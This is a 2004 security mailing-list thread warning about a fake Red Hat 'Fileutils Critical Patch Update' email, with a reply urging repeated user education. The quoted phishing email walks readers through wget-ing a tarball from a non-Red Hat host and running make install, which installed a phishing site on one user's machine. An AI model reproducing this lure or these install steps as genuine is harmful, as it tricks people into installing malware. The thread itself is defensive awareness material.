[unisog] Fake Redhat update

STeve Andre' andres at msu.edu
Tue Nov 23 09:20:09 GMT 2004


The only defense for this is to teach people a little paranoid, and to
repeatedly pound into them the fact that *any* "notice" to do something
to their computer other than through official channels is bad.

But doesn't common sense ever come into play here?  The url isn't from
a company.  I would hope that most folks would key on that, but likely
not...

Educating your users, over and over again seems to be the only way
to deal with this.  Thats what I do.

--STeve Andre'
MSU Dept. of Political Science
andres at msu.edu

On Tuesday 23 November 2004 05:19 am, Peter Van Epp wrote:
>  Just a heads up, one of our users got caught by this one and installed
> the patch (which promptly opened an Ebay phishing site on their machine for
> a few hours):
>
> Peter Van Epp / Operations and Technical Support
> Simon Fraser University, Burnaby, B.C. Canada
>
>
>
> From: Fedora Red Hat=20
> To:
> Sent: Saturday, November 20, 2004 2:09 PM
> Subject: Fileutils Critical Patch Update
>
>
>
>
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: Red Hat=20
>
> A complete revision history is at the end of this file.=20
>
> Dear Red Hat user,
>
> We have found a vulnerability in fileutils (ls and mkdir), that could =
> allow a remote attacker to execute arbitrary code with root privileges. =
> Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, =
> RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is =
> known that *BSD and Solaris platforms are NOT affected.
>
> The Red Hat Security Team strongly advises you to immediately apply the =
> fileutils-1.0.6 patch. This is a critical-critical update that you must =
> make by following these steps:
>
>   a.. First download the patch from the Wcml Red Hat mirror: wget =
> http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or directly =
> here.=20
>   b.. Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz=20
>   c.. cd fileutils-1.0.6.patch=20
>   d.. make=20
>   e.. make install=20
> Again, please apply this patch as soon as possible or you risk your =
> system and others` to be compromised.
>
> Thank you for your prompt attention to this serious matter,
>
> Red Hat Security Team.
>
> Copyright =A9 2004 Red Hat, Inc. All rights reserved.=20
>
> _______________________________________________
> unisog mailing list
> unisog at lists.sans.org
> http://www.dshield.org/mailman/listinfo/unisog



More information about the unisog mailing list